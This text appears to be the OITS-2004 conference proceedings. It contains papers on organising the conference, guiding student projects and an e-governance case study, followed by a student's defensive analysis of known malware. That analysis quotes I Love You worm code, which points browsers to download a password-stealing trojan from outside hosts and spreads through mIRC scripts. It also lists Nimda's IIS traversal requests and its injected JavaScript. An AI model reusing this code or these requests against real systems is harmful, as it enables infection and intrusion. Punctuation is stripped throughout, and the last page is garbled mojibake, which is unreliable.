Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren 